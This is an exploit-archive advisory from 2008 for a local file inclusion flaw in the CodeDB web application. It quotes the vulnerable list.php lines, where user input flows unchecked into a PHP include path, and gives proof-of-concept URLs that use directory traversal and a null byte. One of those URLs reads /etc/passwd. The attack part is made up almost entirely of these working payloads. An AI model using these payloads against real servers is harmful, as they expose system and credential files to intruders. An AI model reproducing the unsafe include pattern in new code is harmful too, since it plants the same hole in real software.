CodeDB (list.php lang) Local File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : CodeDB (list.php lang) Local File Inclusion Vulnerability
# Published : 2008-07-14
# Author : cOndemned
# Previous Title : HockeySTATS Online 2.0 Multiple Remote SQL Injection Vulnerabilities
# Next Title : Bilboblog 2.1 Multiple Remote Vulnerabilities

###############################################################################
#
#   Name    :   CodeDB (list.php lang) Local File Inclusion Vulnerability
#   Author  :   cOndemned
#   Greetz  :   ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*
#
###############################################################################

Source :

    // list.php
    
    2.  $lang = htmlspecialchars($_GET['lang']);            // ok, but.... for what ? lol
    
    7.  if(file_exists('templates/'.$lang.'_middle.php'))   // We'll have to cut off rest of filename & extension
	8.      include('templates/'.$lang.'_middle.php');      // Ekhm... pwned ;d
    
    
Proof of Concept :

    http://[host]/[codeDB_path]/list.php?lang=../readme.txt%00
    http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd%00
    http://[host]/[codeDB_path]/list.php?lang=../[local_file]%00

    
EoF.   

# www.Syue.com [2008-07-14]